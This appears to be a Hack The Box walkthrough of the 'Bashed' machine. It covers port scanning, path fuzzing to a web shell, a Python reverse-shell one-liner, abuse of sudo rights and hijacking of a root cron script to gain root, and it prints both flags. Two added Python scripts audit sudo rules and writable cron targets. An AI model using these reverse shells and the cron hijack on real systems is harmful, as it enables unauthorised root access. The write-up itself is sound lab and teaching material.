Contents
Connect to the HTB server and start the target machine
1.How many open TCP ports are listening on Bashed?
2.What is the relative path on the webserver to a folder that contains phpbash.php?
3.What user is the webserver running as on Bashed?
Run the command: whoami
4.Submit the flag located in the arrexel user's home directory.
USER_FLAG:cbe6de5b0feafc1ab51318e2ee21537f
5.www-data can run any command as a user without a password. What is that user's username?
6.What folder in the system root can scriptmanager access that www-data could not?
Payload
7.What is filename of the file that is being run by root every couple minutes?
View the contents of test.py
8.Submit the flag located in root's home directory.
ROOT_FLAG:291ef33b4e52533112fc62ee76664fad
Connect to the HTB server and start the target machine
Target IP: 10.10.10.68
Assigned IP: 10.10.16.6
1.How many open TCP ports are listening on Bashed?
Port-scan the target with nmap
nmap -p- -T4 --min-rate=1500 -sS -Pn {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -T4 --min-rate=1500 -sS -Pn 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 00:12 EDT
Nmap scan report for 10.10.10.68
Host is up (0.096s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 29.52 seconds
From the scan results, the target has a single open port: 80
2.What is the relative path on the webserver to a folder that contains phpbash.php?
The target's home page contains a blog post about phpbash
Use ffuf to fuzz paths on the target and locate phpbash
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ffuf -u http://10.10.10.68/FUZZ/phpbash.php -w ../dictionary/common.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/ \ \_\
          \/_/    \/_/   \/___/   \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.68/FUZZ/phpbash.php
 :: Wordlist         : FUZZ: /home/kali/Desktop/dictionary/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.hta [Status: 403, Size: 302, Words: 22, Lines: 12, Duration: 144ms]
.htpasswd [Status: 403, Size: 307, Words: 22, Lines: 12, Duration: 144ms]
.htaccess [Status: 403, Size: 307, Words: 22, Lines: 12, Duration: 169ms]
dev [Status: 200, Size: 8151, Words: 3407, Lines: 216, Duration: 70ms]
server-status [Status: 403, Size: 311, Words: 22, Lines: 12, Duration: 72ms]
:: Progress: [4614/4614] :: Job [1/1] :: 415 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
From the output, the path /dev returns status code 200
3.What user is the webserver running as on Bashed?
Access the file directly: http://{TARGET_IP}/dev/phpbash.php
Run the command: whoami
From the output, the web server runs as the user: www-data
4.Submit the flag located in the arrexel user's home directory.
Locate user_flag
find / -name 'user.txt'
View the contents of user_flag
cat /home/arrexel/user.txt
www-data@bashed:/var/www/html/dev# cat /home/arrexel/user.txt
cbe6de5b0feafc1ab51318e2ee21537f
USER_FLAG:cbe6de5b0feafc1ab51318e2ee21537f
5.www-data can run any command as a user without a password. What is that user's username?
Check which privileged commands the current user may run
sudo -l
www-data@bashed:/var/www/html/dev# sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
From the output, the current user can run any command as the scriptmanager user without a password
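A rule like `(scriptmanager : scriptmanager) NOPASSWD: ALL` is exactly what a host hardening review should catch before an attacker does. The following Python script is an added example, not part of the original writeup: it parses `sudo -l` output into structured rules and flags the ones that grant every command. The sample text embeds the output captured above plus one made-up, narrowly scoped `systemctl` rule for contrast (that second rule does not exist on the box).

```python
import re

# Constructed sample: the "sudo -l" output captured above, plus one made-up
# narrowly scoped rule for contrast (the systemctl line does not exist on the box).
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

# One rule line: "(runas_user : runas_group) TAG: TAG: command list"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.*)$")


def parse_sudo_rules(text):
    """Return the rules listed after the 'may run the following commands' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "runas_user": runas[0] or "root",
            "runas_group": runas[1] if len(runas) > 1 else None,
            "tags": tags,
            "commands": m.group("cmds").strip(),
        })
    return rules


def risky_sudo_rules(text):
    """Flag rules that hand out a full shell as another user, with reasons."""
    findings = []
    for rule in parse_sudo_rules(text):
        reasons = []
        if rule["commands"] == "ALL":
            reasons.append("any command")
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password required")
        if rule["runas_user"] in ("root", "ALL"):
            reasons.append("runs as root")
        # ALL commands is a shell by definition; NOPASSWD as root is as bad
        if rule["commands"] == "ALL" or ("NOPASSWD" in rule["tags"] and rule["runas_user"] in ("root", "ALL")):
            findings.append({"runas_user": rule["runas_user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"risky sudo rule -> {f['runas_user']}: {', '.join(f['reasons'])}")
```

Run against real `sudo -l` output (or against each user's rules via `sudo -l -U user` as root) it turns the manual check in this step into something that can be scheduled. The fix on a box like this is to replace `ALL` with the specific scripts the web user actually needs to run.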
6.What folder in the system root can scriptmanager access that www-data could not?
Use the Python environment present on the target to get a reverse shell
Payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Start an nc listener on the local side
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.68] 51118
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Upgrade to a full TTY, then list every folder in the system root with its permissions
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@bashed:/var/www/html/dev$ ls -la /
ls -la /
total 92
drwxr-xr-x 23 root root 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw------- 1 root root 174 Jun 14 2022 .bash_history
drwxr-xr-x 2 root root 4096 Jun 2 2022 bin
drwxr-xr-x 3 root root 4096 Jun 2 2022 boot
drwxr-xr-x 19 root root 4140 Oct 18 20:56 dev
drwxr-xr-x 89 root root 4096 Jun 2 2022 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 174 root root 0 Oct 18 20:56 proc
drwx------ 3 root root 4096 Oct 18 20:57 root
drwxr-xr-x 18 root root 500 Oct 18 20:56 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Oct 18 22:02 sys
drwxrwxrwt 10 root root 4096 Oct 18 22:29 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Jun 2 2022 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
From the output: the /scripts folder is accessible to scriptmanager but not to www-data
7.What is filename of the file that is being run by root every couple minutes?
Switch to the scriptmanager user directly via sudo
www-data@bashed:/var/spool/cron$ sudo -i -u scriptmanager
sudo -i -u scriptmanager
scriptmanager@bashed:~$ whoami
whoami
scriptmanager
Enter the /scripts directory
cd /scripts
List all files in the directory with their permissions and timestamps
ls -la
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Oct 18 23:19 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 Oct 18 23:19 test.txt
After I deleted test.txt, a new test.txt with a fresh timestamp was regenerated two minutes later
View the contents of test.py
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
The script opens test.txt and writes content into it
From this we can conclude that test.py is included in a scheduled (cron) task run by root
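The root cause here is a root cron job executing a script that lives in a directory owned and writable by a lower-privileged user. The following Python script is an added example, not part of the original writeup: it audits `/etc/crontab`-style entries for root jobs whose script, or the directory containing it, is writable by someone other than root. Root's actual crontab was never shown on the page, so the `cd /scripts && python test.py` entry is an assumption based on the observed behaviour; the file ownership and modes for /scripts mirror the `ls -la` output above, and the cron.hourly entries are made up for contrast.

```python
import os
import posixpath
import shlex
import stat

# Constructed system crontab (/etc/crontab format: 5 time fields, user, command).
# Root's real crontab was not shown on the page; the first entry is assumed from
# the observed behaviour (test.txt reappearing every couple of minutes). The
# second is a benign, root-owned job added for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/2 * * * * root cd /scripts && python test.py
17 * * * * root /etc/cron.hourly/logrotate
"""

# Constructed stat results: path -> (owner, group, st_mode). The /scripts entries
# mirror the ls -la output above; the cron.hourly entries are made up.
SAMPLE_FS = {
    "/scripts": ("scriptmanager", "scriptmanager", 0o40774),
    "/scripts/test.py": ("scriptmanager", "scriptmanager", 0o100644),
    "/etc/cron.hourly": ("root", "root", 0o40755),
    "/etc/cron.hourly/logrotate": ("root", "root", 0o100755),
}


def stat_lookup(path):
    """Live lookup for real use: (owner, group, st_mode), or None if missing."""
    import pwd, grp
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (pwd.getpwuid(st.st_uid).pw_name, grp.getgrgid(st.st_gid).gr_name, st.st_mode)


def find_script_paths(command, cwd="/"):
    """Absolute paths a cron command references, following 'cd DIR && ...'."""
    paths = []
    tokens = shlex.split(command)
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "cd" and i + 1 < len(tokens):
            cwd = tokens[i + 1]  # later relative paths resolve against this
            i += 2
            continue
        if tok in ("&&", "||", ";", "|") or tok.startswith("-"):
            i += 1
            continue
        paths.append(posixpath.normpath(tok if tok.startswith("/") else posixpath.join(cwd, tok)))
        i += 1
    return paths


def writable_by_non_root(owner, mode):
    """True if someone other than root can modify the file or directory."""
    return owner != "root" or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(crontab_text, lookup=stat_lookup):
    """Flag root jobs whose script, or the directory holding it, is non-root writable."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7 or parts[5] != "root":
            continue
        command = parts[6]
        checks = set()
        for p in find_script_paths(command):
            checks.update((p, posixpath.dirname(p)))  # the file and its parent dir
        for path in sorted(checks):
            info = lookup(path)
            if info and writable_by_non_root(info[0], info[2]):
                findings.append({"command": command, "path": path,
                                 "owner": info[0], "mode": oct(stat.S_IMODE(info[2]))})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FS.get):
        print(f"{f['path']} ({f['owner']}, {f['mode']}) is run by root via: {f['command']}")
```

Both the directory (owner scriptmanager, mode 774) and the script are flagged: even a root-owned, read-only test.py would still be replaceable because the directory itself belongs to scriptmanager. The mitigation is to keep root-run scripts under a root-owned, non-writable directory, or to run the job as scriptmanager if that is the privilege it really needs.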
8.Submit the flag located in root's home directory.
Write a new test.py locally and deliver it to the target to get a reverse shell
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.6",1426));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Delete all files in the target's scripts directory
scriptmanager@bashed:/scripts$ rm test.py test.txt
rm test.py test.txt
rm: remove write-protected regular file 'test.txt'? yes
yes
scriptmanager@bashed:/scripts$ ls
ls
scriptmanager@bashed:/scripts$
Upload the local test.py to the target
wget http://{NATIVE_IP}:{NATIVE_PORT}/test.py -O test.py
scriptmanager@bashed:/scripts$ wget http://10.10.16.6:6666/test.py -O test.py
wget http://10.10.16.6:6666/test.py -O test.py
--2024-10-18 23:26:42-- http://10.10.16.6:6666/test.py
Connecting to 10.10.16.6:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 221 [text/x-python]
Saving to: 'test.py'

test.py             100%[===================>]     221  --.-KB/s    in 0s

2024-10-18 23:26:42 (70.6 MB/s) - 'test.py' saved [221/221]
scriptmanager@bashed:/scripts$ ls
ls
test.py
Set permissions to 777 so that the root user has sufficient permissions to run the file
chmod 777 test.py
Start a new nc listener locally on a different port and wait for root's scheduled task to run test.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.68] 55542
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Locate root_flag
find / -name 'root.txt'
View the contents of root_flag
cat /root/root.txt
# find / -name 'root.txt'
/root/root.txt
# cat /root/root.txt
291ef33b4e52533112fc62ee76664fad